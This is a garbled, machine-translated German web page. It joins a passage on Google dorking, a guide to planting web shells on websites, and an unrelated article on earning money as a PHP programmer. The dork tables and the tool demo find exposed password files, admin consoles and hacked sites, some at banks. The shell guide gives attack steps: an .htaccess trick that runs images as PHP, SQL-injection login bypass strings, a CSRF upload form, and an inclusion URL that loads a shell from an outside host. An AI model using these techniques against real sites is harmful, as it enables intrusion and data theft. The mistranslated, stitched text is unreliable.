Suchen Sie im Seitentitel. Text zwischen Tags <br></td> <td width="214">intitle:“index of“ – findet alle Seiten mit Verzeichniseinträgen <br></td> </tr><tr><td width="214">ext <br></td> <td width="214">Suchen Sie nach Seiten mit einer bestimmten Erweiterung <br></td> <td width="214">ext:pdf – findet alle PDF-Dateien <br></td> </tr><tr><td width="214">Dateityp <br></td> <td width="214">Derzeit völlig ähnlich wie im Unterricht. das Wort „ext“ <br></td> <td width="214">Dateityp:pdf – ähnlich <br></td> </tr><tr><td width="214">verwandt <br></td> <td width="214">Suchen Sie nach Websites mit ähnlichen Themen <br></td> <td width="214">verwandt:google.ru - zeigt seine Analoga <br></td> </tr><tr><td width="214">Verknüpfung <br></td> <td width="214">Suchen Sie nach Websites, die darauf verweisen <br></td> <td width="214">link:somesite.ru – findet alle Websites, die einen Link dazu haben <br></td> </tr><tr><td width="214">definieren <br></td> <td width="214">Wortdefinition anzeigen <br></td> <td width="214">define:0day – Definition des Begriffs <br></td> </tr><tr><td width="214">Zwischenspeicher <br></td> <td width="214">Seiteninhalte im Cache anzeigen (falls vorhanden) <br></td> <td width="214">Cache:google.com – öffnet eine zwischengespeicherte Seite <br></td> </tr></tbody></table><p>Tabelle 2 – Sonderzeichen für Google-Anfragen <br></p><table><tbody><tr><td width="214"><b>Symbol</b><br></td> <td width="214"><b>Bedeutung</b><br></td> <td width="214"><b>Beispiel</b><br></td> </tr><tr><td width="214">“<br></td> <td width="214">Exakte Formulierung <br></td> <td width="214">intitle:„RouterOS-Router-Konfigurationsseite“ – Suche nach Routern <br></td> </tr><tr><td width="214">*<br></td> <td width="214">Beliebiger Text <br></td> <td width="214">inurl: „bitrix*mcart“ – Suche nach Websites auf Bitrix mit einem anfälligen mcart-Modul <br></td> </tr><tr><td width="214">.<br></td> <td width="214">Jeder Charakter <br></td> <td width="214">Index.of – ähnlich dem Index der Anfrage <br></td> </tr><tr><td width="214">-<br></td> <td width="214">Ein Wort löschen <br></td> <td width="214">Fehlerwarnung – zeigt alle Seiten an, die einen Fehler, aber keine Warnung haben <br></td> </tr><tr><td width="214">..<br></td> <td width="214">Reichweite <br></td> <td width="214">cve 2006..2016 – Zeigt Schwachstellen nach Jahr ab 2006 an <br></td> </tr><tr><td width="214">|<br></td> <td width="214">Logisches „oder“ <br></td> <td width="214">Linux | Fenster – Seiten anzeigen, auf denen entweder das erste oder das zweite Wort vorkommt <br></td> </tr></tbody></table><br>Es ist wichtig zu verstehen, dass jede Anfrage an eine Suchmaschine nur eine Suche nach Wörtern ist. <br>Es ist sinnlos, auf der Seite nach Metazeichen zu suchen (Anführungszeichen, Klammern, Satzzeichen usw.). Sogar eine Suche nach der genauen Phrase, die in Anführungszeichen angegeben ist, ist eine Wortsuche, gefolgt von einer Suche nach einer genauen Übereinstimmung in den Ergebnissen. <p>Alle Idioten der Google-Hack-Datenbank sind logisch in 14 Kategorien unterteilt und in Tabelle 3 aufgeführt. <br>Tabelle 3 – Kategorien der Google Hack-Datenbank <br></p><table><tbody><tr><td width="168"><b>Kategorie</b><br></td> <td width="190"><b>Was ermöglicht es Ihnen zu finden?</b><br></td> <td width="284"><b>Beispiel</b><br></td> </tr><tr><td width="168">Standbeine <br></td> <td width="190">Web-Shells, öffentliche Dateimanager <br></td> <td width="284">Finden Sie alle gehackten Websites, auf denen die aufgelisteten Webshells hochgeladen sind: <br>(intitle:"phpshell" ODER intitle:"c99shell" ODER intitle:"r57shell" ODER intitle:"PHP Shell" ODER intitle:"phpRemoteView") `rwx` „uname“ <br></td> </tr><tr><td width="168">Dateien, die Benutzernamen enthalten <br></td> <td width="190">Registrierungsdateien, Konfigurationsdateien, Protokolle, Dateien mit dem Verlauf der eingegebenen Befehle <br></td> <td width="284">Finden Sie alle Registrierungsdateien mit Kontoinformationen: <br><i>Dateityp: reg reg + Intext: „Internet Account Manager“</i><br></td> </tr><tr><td width="168">Sensible Verzeichnisse <br></td> <td width="190">Verzeichnisse mit verschiedenen Informationen (persönliche Dokumente, VPN-Konfigurationen, versteckte Repositorys usw.) <br></td> <td width="284">Finden Sie alle Verzeichniseinträge, die VPN-bezogene Dateien enthalten: <br><i>„Config“ intitle:“Index of“ intext:vpn</i><br>Websites mit Git-Repositories: <br><i>(intext:"index of /.git") ("übergeordnetes Verzeichnis")</i><br></td> </tr><tr><td width="168">Erkennung von Webservern <br></td> <td width="190">Version und andere Informationen zum Webserver <br></td> <td width="284">Suchen Sie nach JBoss-Server-Verwaltungskonsolen: <br><i>inurl:"/web-console/" intitle:"Administration Console"</i><br></td> </tr><tr><td width="168">Anfällige Dateien <br></td> <td width="190">Skripte, die bekannte Schwachstellen enthalten <br></td> <td width="284">Suchen Sie nach Websites, die ein Skript verwenden, mit dem Sie eine beliebige Datei vom Server hochladen können: <br><i>allinurl:forcedownload.php?file=</i><br></td> </tr><tr><td width="168">Anfällige Server <br></td> <td width="190">Installationsskripte, Web-Shells, offene Verwaltungskonsolen usw. <br></td> <td width="284">Finden Sie offene PHPMyAdmin-Konsolen, die als Root ausgeführt werden: <br><i>intitle:phpMyAdmin „Willkommen bei phpMyAdmin ***“ „läuft auf * als root@*“</i><br></td> </tr><tr><td width="168">Fehlermeldungen <br></td> <td width="190">Verschiedene Fehler und Warnungen offenbaren oft wichtige Informationen – von der CMS-Version bis hin zu Passwörtern <br></td> <td width="284">Websites, bei denen beim Ausführen von SQL-Abfragen an die Datenbank Fehler auftreten: <br><i>„Warnung: mysql_query()“ „ungültige Abfrage“</i><br></td> </tr><tr><td width="168">Dateien mit interessanten Informationen <br></td> <td width="190">Zertifikate, Backups, E-Mails, Protokolle, SQL-Skripte usw. <br></td> <td width="284">Finden Sie Initialisierungs-SQL-Skripte: <br><i>filetype:sql und „insert into“ -site:github.com</i><br></td> </tr><tr><td width="168">Dateien mit Passwörtern <br></td> <td width="190">Alles, was Passwörter enthalten kann – Protokolle, SQL-Skripte usw. <br></td> <td width="284">Protokolle, in denen Passwörter erwähnt werden: <br><i>Dateityp:</i><i>Protokoll</i><i>im Text:</i><i>Passwort |</i><i>passieren |</i><i>pw</i><br>SQL-Skripte mit Passwörtern: <br><i>ext:</i><i>sql</i><i>im Text:</i><i>Nutzername</i><i>im Text:</i><i>Passwort</i><br></td> </tr><tr><td width="168">Sensible Online-Shopping-Informationen <br></td> <td width="190">Informationen zu Online-Käufen <br></td> <td width="284">Pincodes finden: <br><i>dcid=</i><i>bn=</i><i>Stift</i><i>Code=</i><br></td> </tr><tr><td width="168">Netzwerk- oder Schwachstellendaten <br></td> <td width="190">Informationen, die nicht direkt mit der Webressource in Zusammenhang stehen, sich aber auf das Netzwerk oder andere Nicht-Webdienste auswirken <br></td> <td width="284">Suchen Sie nach automatischen Proxy-Konfigurationsskripten mit Informationen zum internen Netzwerk: <br><i>inurl:proxy | inurl:wpad ext:pac | ext:dat findproxyforurl</i><br></td> </tr><tr><td width="168">Seiten mit Anmeldeportalen <br></td> <td width="190">Seiten mit Anmeldeformularen <br></td> <td width="284">Saplogon-Webseiten: <br><i>intext:"2016 SAP AG. Alle Rechte vorbehalten." intitle:"Anmelden"</i><br></td> </tr><tr><td width="168">Verschiedene Online-Geräte <br></td> <td width="190">Drucker, Router, Überwachungssysteme usw. <br></td> <td width="284">Suchen Sie das Druckerkonfigurationsfenster: <br><i>Titel:"</i><i>PS</i><i>Laserjet"</i><i>inurl:</i><i>SSI/</i><i>Auth/</i><i>Satz_</i><i>config_</i><i>Geräteinformationen.</i><i>htm</i><br></td> </tr><tr><td width="168">Hinweise und Schwachstellen <br></td> <td width="190">Websites mit anfälligen CMS-Versionen <br></td> <td width="284">Finden Sie anfällige Plugins, mit denen Sie eine beliebige Datei auf den Server hochladen können: <br><i>inurl:fckeditor -intext:"ConfigIsEnabled = False" intext:ConfigIsEnabled</i><br></td> </tr></tbody></table><br>Idioten konzentrieren sich häufiger auf die Suche auf allen Internetseiten. Aber nichts hindert Sie daran, den Suchbereich auf einer oder mehreren Websites einzuschränken. <br>Jede Google-Abfrage kann auf eine bestimmte Website konzentriert werden, indem das Schlüsselwort „site:somesite.com“ zur Abfrage hinzugefügt wird. Dieses Schlüsselwort kann jedem Idioten hinzugefügt werden. <p><b>Automatisierung der Suche nach Schwachstellen</b><br>So entstand die Idee, ein einfaches Dienstprogramm zu schreiben, das die Suche nach Schwachstellen mithilfe einer Suchmaschine (Google) automatisiert und auf der Google Hack-Datenbank basiert.</p><p>Das Dienstprogramm ist ein in NodeJS geschriebenes Skript mit PhantomJS. Genauer gesagt wird das Skript von phantomjs selbst interpretiert. <br>Phantomjs ist ein vollwertiger Webbrowser ohne GUI, gesteuert durch JS-Code und mit einer praktischen API. <br>Das Dienstprogramm erhielt einen durchaus verständlichen Namen – Idioten. Durch die Ausführung auf der Kommandozeile (ohne Optionen) erhalten wir eine kurze Hilfe mit mehreren Anwendungsbeispielen: <br><br><img src='https://i0.wp.com/habrastorage.org/getpro/habr/post_images/edd/6fb/ccc/edd6fbccc5ec340abe750f3073c1b427.jpg' width="100%" loading=lazy loading=lazy><br>Abbildung 1 – Liste der wichtigsten Optionen für Idioten</p><p>Die allgemeine Syntax des Dienstprogramms lautet: dork „Befehl“ „Optionsliste“. <br>Eine detaillierte Beschreibung aller Optionen finden Sie in Tabelle 4.</p><p>Tabelle 4 – Dorks-Syntax <br></p><table border="1"><tbody><tr><td width="214"><b>Team</b><br></td> <td width="214"><b>Möglichkeit</b><br></td> <td width="214"><b>Beschreibung</b><br></td> </tr><tr><td rowspan="4" width="214">ghdb <br></td> <td width="214">-l <br></td> <td width="214">Drucken Sie eine nummerierte Liste der Idiotenkategorien in der Google Hack-Datenbank aus <br></td> </tr><tr><td width="214">-c „Kategorienummer oder Name“ <br></td> <td width="214">Laden Sie Türen der angegebenen Kategorie nach Nummer oder Name <br></td> </tr><tr><td width="214">-q „Satz“ <br></td> <td width="214">Laden Sie auf Anfrage gefundene Idioten herunter <br></td> </tr><tr><td width="214">-o "Datei" <br></td> <td width="214">Speichern Sie das Ergebnis in einer Datei (nur mit -c|-q-Optionen) <br></td> </tr><tr><td rowspan="8" width="214">Google <br></td> <td width="214">-d „Idiot“ <br></td> <td width="214">Legen Sie einen beliebigen Trottel fest (die Option kann mehrmals verwendet werden, eine Kombination mit der Option -D ist zulässig) <br></td> </tr><tr><td width="214">-D „Datei“ <br></td> <td width="214">Verwenden Sie Dorks aus der Datei <br></td> </tr><tr><td width="214">-s „Website“ <br></td> <td width="214">Site festlegen (Option kann mehrfach verwendet werden, Kombination mit Option -S ist erlaubt) <br></td> </tr><tr><td width="214">-S „Datei“ <br></td> <td width="214">Verwenden Sie Websites aus einer Datei (Dorks werden für jede Website unabhängig durchsucht) <br></td> </tr><tr><td width="214">-f „Filter“ <br></td> <td width="214">Legen Sie zusätzliche Schlüsselwörter fest (werden zu jedem Idioten hinzugefügt) <br></td> </tr><tr><td width="214">-t "Anzahl der ms" <br></td> <td width="214">Intervall zwischen Anfragen an Google <br></td> </tr><tr><td width="214">-T „Anzahl der ms“ <br></td> <td width="214">Timeout, wenn ein Captcha auftritt <br></td> </tr><tr><td width="214">-o "Datei" <br></td> <td width="214">Speichern Sie das Ergebnis in einer Datei (es werden nur die Tracks gespeichert, für die etwas gefunden wurde) <br></td> </tr></tbody></table><br>Mit dem Befehl ghdb können Sie alle Idioten von Exploit-db per beliebiger Anfrage abrufen oder die gesamte Kategorie angeben. Wenn Sie Kategorie 0 angeben, wird die gesamte Datenbank entladen (ca. 4,5 Tausend Idioten). <p>Die Liste der derzeit verfügbaren Kategorien ist in Abbildung 2 dargestellt. <br><br><img src='https://i1.wp.com/habrastorage.org/getpro/habr/post_images/b8f/b11/ffe/b8fb11ffeaced5066fd2fd9e43be67fb.jpg' width="100%" loading=lazy loading=lazy></p><p>Abbildung 2 – Liste der verfügbaren GHDB-Dork-Kategorien</p><p>Das Google-Team ersetzt jeden Idioten in der Google-Suchmaschine und analysiert das Ergebnis auf Übereinstimmungen. Die Pfade, in denen etwas gefunden wurde, werden in einer Datei gespeichert. <br>Das Dienstprogramm unterstützt verschiedene Suchmodi: <br>1 Idiot und 1 Site; <br>1 Idiot und viele Seiten; <br>1 Seite und viele Idioten; <br>viele Seiten und viele Idioten; <br>Die Liste der Trottel und Sites kann entweder über ein Argument oder über eine Datei angegeben werden.</p><p><b>Demonstration der Arbeit</b><br>Versuchen wir am Beispiel der Suche nach Fehlermeldungen nach eventuellen Schwachstellen zu suchen. Per Befehl: dorks ghdb –c 7 –oerrors.dorks werden alle bekannten Dorks der Kategorie „Fehlermeldungen“ geladen, wie in Abbildung 3 dargestellt. <br><br><img src='https://i1.wp.com/habrastorage.org/getpro/habr/post_images/28c/386/641/28c386641d1528652f7f8e8b8089097a.jpg' width="100%" loading=lazy loading=lazy><br>Abbildung 3 – Laden aller bekannten Idioten der Kategorie „Fehlermeldungen“.</p><p>Dorks werden heruntergeladen und in einer Datei gespeichert. Jetzt müssen sie nur noch auf einer Website „eingestellt“ werden (siehe Abbildung 4). <br><br><img src='https://i2.wp.com/habrastorage.org/getpro/habr/post_images/8e0/a8a/3af/8e0a8a3af4f26544da1faa584813dbff.jpg' width="100%" loading=lazy loading=lazy><br>Abbildung 4 – Suche nach Schwachstellen der gewünschten Website im Google-Cache</p><p>Nach einiger Zeit werden auf der untersuchten Website mehrere Seiten mit Fehlern entdeckt (siehe Abbildung 5).</p><p><img src='https://i1.wp.com/habrastorage.org/getpro/habr/post_images/10b/e83/ba3/10be83ba38f172213ba06b3f9ad05a58.jpg' width="100%" loading=lazy loading=lazy><br>Abbildung 5 – Gefundene Fehlermeldungen</p><p>Als Ergebnis erhalten wir in der Datei result.txt eine vollständige Liste der Idioten, die zu dem Fehler geführt haben. <br>Abbildung 6 zeigt das Ergebnis der Suche nach Site-Fehlern. <br><br>Abbildung 6 – Fehlersuchergebnis</p><p>Im Cache für diesen Idioten wird ein vollständiger Backtrace angezeigt, der die absoluten Pfade der Skripte, das Site-Content-Management-System und den Datenbanktyp offenlegt (siehe Abbildung 7). <br><br><img src='https://i2.wp.com/habrastorage.org/getpro/habr/post_images/0a9/455/588/0a9455588496d6609f5e13d598cb5a48.jpg' width="100%" loading=lazy loading=lazy><br>Abbildung 7 – Offenlegung von Informationen über das Website-Design</p><p>Es ist jedoch zu bedenken, dass nicht alle Idioten von GHDB echte Ergebnisse liefern. Außerdem findet Google möglicherweise keine exakte Übereinstimmung und zeigt ein ähnliches Ergebnis an.</p><p>In diesem Fall ist es sinnvoller, Ihre persönliche Idiotenliste zu verwenden. Es lohnt sich beispielsweise immer, nach Dateien mit „ungewöhnlichen“ Erweiterungen zu suchen, Beispiele dafür sind in Abbildung 8 dargestellt. <br><br><img src='https://i2.wp.com/habrastorage.org/getpro/habr/post_images/d7f/865/693/d7f865693f7fcf13137598eeed0ecb58.jpg' width="100%" loading=lazy loading=lazy><br>Abbildung 8 – Liste der Dateierweiterungen, die für eine normale Webressource nicht typisch sind</p><p>Infolgedessen beginnt Google mit dem Befehl dorks google –D extensions.txt –f bank von der ersten Anfrage an, Websites mit „ungewöhnlichen“ Dateierweiterungen zurückzugeben (siehe Abbildung 9). <br><br><img src='https://i2.wp.com/habrastorage.org/getpro/habr/post_images/107/e1f/a2f/107e1fa2f41c4169bcc254cba2f2f4b6.jpg' width="100%" loading=lazy loading=lazy><br>Abbildung 9 – Suche nach „schlechten“ Dateitypen auf Bank-Websites</p><p>Beachten Sie, dass Google keine Anfragen akzeptiert, die länger als 32 Wörter sind.</p><p>Mit dem Befehl dorks google –d intext:“error|warning|notice|syntax“ –f universität <br>Sie können auf Bildungswebsites nach PHP-Interpreterfehlern suchen (siehe Abbildung 10). <br><br><img src='https://i2.wp.com/habrastorage.org/getpro/habr/post_images/717/74f/e36/71774fe3656bfc058c42d43262fdec4a.jpg' width="100%" loading=lazy loading=lazy><br>Abbildung 10 – PHP-Laufzeitfehler finden</p><p>Manchmal ist es nicht bequem, eine oder zwei Kategorien von Idioten zu verwenden. <br>Wenn beispielsweise bekannt ist, dass die Website auf der Wordpress-Engine läuft, benötigen wir WordPress-spezifische Module. In diesem Fall ist es praktisch, die Google Hack-Datenbanksuche zu verwenden. Der Befehl dorks ghdb –q wordpress –o wordpress_dorks.txt lädt alle dorks von Wordpress herunter, wie in Abbildung 11 dargestellt: <br><br><img src='https://i0.wp.com/habrastorage.org/getpro/habr/post_images/dcb/ac9/a4e/dcbac9a4eb12f6ec775d9cccc2fdee87.jpg' width="100%" loading=lazy loading=lazy><br>Abbildung 11 – Suche nach Dorks im Zusammenhang mit Wordpress</p><p>Kehren wir noch einmal zu den Banken zurück und verwenden den Befehl dorks google –D wordpress_dords.txt –f bank, um zu versuchen, etwas Interessantes im Zusammenhang mit Wordpress zu finden (siehe Abbildung 12). <br><br><img src='https://i0.wp.com/habrastorage.org/getpro/habr/post_images/042/0c2/c43/0420c2c435931704288b171f725ccc6a.jpg' width="100%" loading=lazy loading=lazy><br>Abbildung 12 – Suche nach Wordpress-Schwachstellen</p><p>Es ist erwähnenswert, dass die Suche in der Google Hack-Datenbank keine Wörter akzeptiert, die kürzer als 4 Zeichen sind. Wenn beispielsweise das CMS der Site nicht bekannt ist, die Sprache jedoch bekannt ist – PHP. In diesem Fall können Sie mithilfe der Pipe und dem Systemsuchdienstprogramm „dorks –c all |“ manuell filtern, was Sie benötigen findstr /I php > php_dorks.txt (siehe Abbildung 13): <br><br><img src='https://i1.wp.com/habrastorage.org/getpro/habr/post_images/4c1/2f8/6e1/4c12f86e111074293c14d6a939c6ebab.jpg' width="100%" loading=lazy loading=lazy><br>Abbildung 13 – Durchsuchen Sie alle Idioten, in denen PHP erwähnt wird</p><p>Die Suche nach Schwachstellen oder vertraulichen Informationen in einer Suchmaschine sollte nur dann erfolgen, wenn auf dieser Website ein aussagekräftiger Index vorhanden ist. Wenn eine Website beispielsweise 10 bis 15 Seiten indiziert hat, ist es dumm, auf diese Weise nach irgendetwas zu suchen. Die Überprüfung der Indexgröße ist einfach – geben Sie einfach „site:somesite.com“ in die Google-Suchleiste ein. Ein Beispiel für eine Site mit einem unzureichenden Index ist in Abbildung 14 dargestellt. <br><br><img src='https://i0.wp.com/habrastorage.org/getpro/habr/post_images/78e/1db/b4f/78e1dbb4fc78cd422cec311fc2ca9d33.jpg' width="100%" loading=lazy loading=lazy><br>Abbildung 14 – Überprüfen der Site-Indexgröße</p><p>Nun zum Unangenehmen ... Von Zeit zu Zeit fordert Google möglicherweise ein Captcha an. Sie können dagegen nichts tun. Sie müssen es eingeben. Beim Durchsuchen der Kategorie „Fehlermeldungen“ (90 Idioten) tauchte das Captcha beispielsweise nur einmal auf.</p><p>Es ist erwähnenswert, dass Phantomjs auch die Arbeit über einen Proxy unterstützt, sowohl über die http- als auch über die Socks-Schnittstelle. Um den Proxy-Modus zu aktivieren, müssen Sie die entsprechende Zeile in dorks.bat oder dorks.sh auskommentieren.</p><p>Das Tool ist als Quellcode verfügbar</p> <br>In diesem Artikel möchte ich über die am häufigsten verwendeten Methoden zum Hochladen einer Shell auf eine Website sprechen. <b>Web-Shell</b> ist eine Art bösartiges Skript (Programm), mit dem Angreifer Websites oder Server steuern. <p><b>Methode 1</b><br>Auf der Website finden Sie ein Formular zum Hochladen von Dateien/Bildern. Nehmen wir an, wir konnten das Admin-Panel der Website nicht hacken und versuchen, unsere Shell damit zu überfluten <b>extension.php.jpg .</b> Bei Erfolg sehen wir anstelle des Bildes ein weißes Fenster, wir klicken mit der rechten Maustaste und folgen dem Link. Im Fehlerfall können wir die Chrome-Erweiterung verwenden <b>Manipulationsdaten</b>. Es ermöglicht Ihnen, die Anfrage nach Ihren Wünschen abzufangen und zu ändern. Wenn die Site die Dateierweiterung überprüft, können wir zuerst hochladen <b>.htaccess</b> Datei mit Inhalt: <br>AddType application/x-httpd-php .jpg <br>Dieser Befehl führt JPG-Dateien als PHP aus. <br><b>Ausführliche Videoanleitung:</b><br></p><p><span class="imp1oe54JeQ"></span></p><p>Videoanleitungen für <b>Manipulationsdateninstallation:</b><br></p><p><span class="JA5K4KJ0NCc"></span></p><br><b>Methode 2</b><br>Verwenden Sie das Programm, um auf der Website nach Admin-Panels zu suchen – https://github.com/bdblackhat/admin-panel-finder. Wenn das Programm das Admin-Panel gefunden hat, können wir SQL-Injection ausprobieren. Im Login- und Passwortfeld der Site geben wir den Code ein: <br><p>" oder "1"="1 " ODER 1=1/*</p><p>Wenn es funktioniert, gelangen wir zum Admin-Panel und <b>Wir gehen nach Methode 1 vor.</b> Wenn im Admin-Bereich der Site keine SQL-Injection vorhanden ist, können wir versuchen, sie zu debuggen oder einen Exploit für dieses CMS zu finden. <br><b>Ausführliche Videoanleitung:</b><br></p><p><span class="5Kh5gCr_3rc"></span></p><br><b>Methode 3</b><br>In Methode 3 werden wir auf der Site selbst nach SQL-Injection suchen. Wir können dies manuell tun oder sqlmap verwenden. Es gibt im Forum genügend Themen zur Durchführung von Injektionen, daher komme ich von weit her. So, jetzt haben wir bereits eine Tabelle mit dem Login und Passwort des Administrators gefunden, entschlüsseln die Hashes, gehen zum Admin-Panel und freuen uns. Aber nehmen wir an, wir konnten das Passwort nicht entschlüsseln und alles ging schief, dann müssen wir die Berechtigungen unseres Benutzers überprüfen <b>. </b> Wir prüfen die Privilegien und laden die Mini-Shell. <b>Wenn ich den Code einfügen möchte, erhalte ich aus irgendeinem Grund eine Fehlermeldung auf der Website.</b><p><b>Methode 4</b><br>Methode 4 beinhaltet einen CSRF-Angriff. Im folgenden Code müssen wir ersetzen <b>http://</b> zu unserem Ziellink. <b>Schale auswählen</b> und drücken Sie die Taste <b>hochladen.</b><br></p><p> <form method="POST" action="http://" enctype="multipart/form-data" > <input type="file" name="Filedata"></center><br> <input type="submit" name="Submit" value="Hochladen"> </form></p><p><span class="FXOjzV5I1Cc"></span></p><br><b>Methode 5</b><br>Erfahren Sie mehr über Ihr Ziel und finden Sie einen Exploit. Hierzu gibt es eine sehr interessante Website – https://www.exploit-db.com. Niemand hat das massive Hacken von Websites durch Schwachstellen abgesagt, aber auf dem Formular gibt es bereits einen Artikel darüber. <p>Es gibt viele weitere Möglichkeiten, eine Hülle zu füllen, und es hat keinen Sinn, über jede einzelne zu sprechen. Wenn Sie üben möchten, dann installieren Sie dvwa – ein Programm, das Sicherheitsexperten dabei helfen soll, ihre Fähigkeiten und Werkzeuge in einem rechtlichen Umfeld zu testen.</p><p><b>Methode 6 <br><b>PHP-Injektion</b>– Dies ist eine Form des Angriffs auf eine Website, bei der der Angreifer seinen PHP-Code in die angegriffene PHP-Anwendung einschleust.</b><br>www.site.ru?page=home.html <br>Durch Ausführen des Befehls laden wir die Startseite und die HTML-Seite. Jetzt werden wir versuchen, eine schädliche Shell zu laden. <br>www.site.ru?page=http://hacker.ru/webshell.php <br>Idiot: <b>Inurl:page=</b></p><p>Es gibt auch eine Möglichkeit, mit Perl eine bereits geladene Shell zu finden</p> <p> » </p><h1>Wie kann ein PHP-Programmierer zu Hause gutes Geld verdienen?</h1><p>Die meisten erfolgreichen PHP-Programmierer verdienen von zu Hause aus gutes Geld. Zu Beginn eines jeden Einkommens treten Schwierigkeiten auf. Es kommt vor, dass Schwierigkeiten und mangelnde Kenntnis der Verdienstmethoden jeden Wunsch entmutigen, zu Hause Geld zu verdienen, und dann suchen Programmierer nach einer Möglichkeit, in Büros zu arbeiten, wo eine größere Garantie dafür besteht, dass jeden Monat Geld empfangen werden kann und sich beruflich weiterentwickeln lässt möglich.</p><p>Aber die Möglichkeit, von zu Hause aus zu arbeiten, hat mehr Vor- als Nachteile.</p><h3>Profis</h3><p>Sie werden für sich selbst arbeiten. Niemand wird Sie entlassen, Sie können Ihren eigenen Zeitplan einteilen oder zu der von Ihnen gewünschten Zeit arbeiten.</p><p>Sie wählen selbst einen Weg, mit Programmierung Geld zu verdienen, was erstens Ihr Interesse an der Arbeit steigert und zweitens Ihnen große Handlungsfreiheit bietet. Sie müssen nicht an etwas arbeiten, das Ihnen nicht gefällt. Es gibt auch mehr Möglichkeiten, Möglichkeiten zum Geldverdienen zu kombinieren.</p><h3>Minuspunkte</h3><p>Am Anfang wird es schwierig sein und um das erste Geld für Ihre Arbeit zu bekommen, müssen Sie viel Mühe und Zeit investieren. Und um einen Gewinn zu erzielen, müssen Sie sich ständig weiterentwickeln, Geduld haben und Ihren Zeitplan richtig verteilen, damit Sie genügend Zeit haben, die Arbeiten pünktlich abzuschließen.</p><h3>Verdienen Sie Geld mit Ihren Skripten</h3><p>Es gibt viele verschiedene Skripte im Internet, die Benutzer einfach herunterladen und auf ihrer Website installieren können. Sie können Ihr eigenes, einzigartiges Skript schreiben und es gibt zwei Möglichkeiten, wie Sie mit Ihrem Skript Geld verdienen können. Verkaufen Sie es oder veröffentlichen Sie es über Filesharing-Dienste. Sie können auch zwei Optionen verwenden. Zum Beispiel leichte Skripte, aber gleichzeitig ist es auch sehr wichtig, über Filesharing-Dienste genau die Skripte zu platzieren, die besonders gefragt sind. Dazu müssen die Skripte gefragt sein, damit die Leute sie für ihre Bedürfnisse herunterladen.</p><p>Große Skripte können zu vernünftigen Preisen verkauft werden. Sie können eine Anzeige in Foren veröffentlichen oder, wenn Sie einen eigenen Blog oder eine eigene Website haben, eine Anzeige für den Verkauf von Skripten schalten.</p><p>Unabhängig davon, für welche Option Sie sich entscheiden, legen Sie das Skript in jedem Fall im Archiv ab und fügen Sie unbedingt detaillierte Anweisungen und Kontaktinformationen zu Ihrer Person bei. Stellen Sie sicher, dass Sie Unterstützung leisten, denn es ist Ihnen wichtig, für sich selbst zu arbeiten. Schließlich müssen Sie empfohlen werden oder Ihre Skripte herunterladen lassen. Sie müssen von hoher Qualität sein. Wenn jemand Sie um Hilfe bittet, erklären Sie ihm höflich das Skript oder helfen Sie ihm bei der Installation. Ihre Skripte sollten Kommentare enthalten. Wofür jede Funktion verantwortlich ist usw. Schließlich kann eine Person in Ihrem Code leicht verwirrt werden, wenn es keine Notationen gibt.</p><h3>Eigene und gemeinsame Projekte</h3><p>Um erfolgreich Geld zu verdienen, ist es gut, eine eigene Website zu erstellen. Es gibt viele Möglichkeiten, mit Ihrer Website Geld zu verdienen. Wenn Sie es gut bewerben, können Sie dort Skripte zum Verkauf anbieten. Durch Gemeinschaftsprojekte erweitern Sie Ihre Fähigkeiten, was sich positiv auf den Erfolg Ihrer Heimprogrammierung auswirkt. Suchen Sie daher nach Partnern oder lehnen Sie Angebote zur gemeinsamen Umsetzung eines Projekts nicht ab.</p><p>Sie sollten darauf achten, Funktionen hinzuzufügen, die auf Ihrer Website Aufmerksamkeit erregen. Die Seite mag ein normales, schlichtes Aussehen haben, hat aber gleichzeitig ihre eigene Wendung. Eine persönliche Website trägt zur Steigerung der Kundenzahl bei. Sie werden sehen, wie Ihre Skripte funktionieren, ob das Laden nicht zu lange dauert, ob sie interessant zu verwenden und vor allem originell sind und sich von allem anderen unterscheiden. Dann werden Sie Erfolg haben.</p><h3>Einnahmen aus Bestellungen</h3><p>Registrieren Sie sich dazu einfach in verschiedenen Börsen für Freiberufler und suchen Sie nach Aufträgen. Stellen Sie Ihr Portfolio abgeschlossener Arbeiten aus. Aber seien Sie vorsichtig, es gibt unehrliche Menschen auf der Welt und damit Sie nicht auf Täuschung hereinfallen, zeigen Sie zunächst die Arbeit, die sich auf Ihrem Server befindet (in diesem Fall müssen Sie übrigens einen VPN-Server mieten http:/ /nkvd.pro/vps/), und wenn sie Ihnen dann einen Teil zahlen, übertragen Sie die Hälfte auf ihren Server und machen Sie dasselbe mit dem zweiten Teil. Diese Art des Geldverdienens gilt als profitabel, hängt jedoch vom Grad Ihrer Kenntnisse und Fähigkeiten ab. Es kommt auch auf das Feedback Ihrer Kunden an. Um mit dieser Methode des Geldverdienens erfolgreich zu sein, müssen Sie die Arbeit ehrlich und effizient erledigen. Sie müssen in der Lage sein, mit Kunden zu kommunizieren und klar zu erklären, was Sie tun können und was nicht.</p><p>Dies ist nicht die gesamte Verdienstliste eines PHP-Programmierers, aber dank der oben beschriebenen Methoden zum Geldverdienen können Sie bereits Geld verdienen, ohne das Haus zu verlassen. In der Anfangsphase wird dies eine große Leistung sein. Die Hauptsache ist, hier nicht aufzuhören. Verbessern Sie sich ständig und schaffen Sie Projekte, die Ihnen nicht nur ein gutes Einkommen, sondern auch Freude bringen.</p> <br><b>Über den Autor</b> <br><p>Wie kann ein PHP-Programmierer zu Hause gutes Geld verdienen?</p> <script type="text/javascript"> <!-- var _acic={dataProvider:10};(function(){var e=document.createElement("script");e.type="text/javascript";e.async=true;e.src="https://www.acint.net/aci.js";var t=document.getElementsByTagName("script")[0];t.parentNode.insertBefore(e,t)})() //--> </script><br> <br> <script>document.write("<img style='display:none;' src='//counter.yadro.ru/hit;artfast_after?t44.1;r"+ escape(document.referrer)+((typeof(screen)=="undefined")?"": ";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth? screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+";h"+escape(document.title.substring(0,150))+ ";"+Math.random()+ "border='0' width='1' height='1' loading=lazy loading=lazy>");</script> </div> </article> <div class="related_block"> <div class="title">Verwandte Veröffentlichungen</div> <ul class="recent_ul"> <li> <div class="img_block"> <div class="overlay"></div> <img src="/uploads/64b7401db355528459e6d4f88f75db81.jpg" style="width:230px; height:145px;" / loading=lazy loading=lazy></div> <a href="https://storerarity.ru/de/chto-novogo-poluchil-stabilizator-zhiyun-crane-plus-tr-hosevoi.html">Dreiachsiger elektronischer Stabilisator Zhiyun Crane Plus (2018) Zeitraffer-Aufnahmefunktion in Bewegung</a></li> <li> <div class="img_block"> <div class="overlay"></div> <img src="/uploads/84de9f3731f3979985fb57b66b81bd5d.jpg" style="width:230px; height:145px;" / 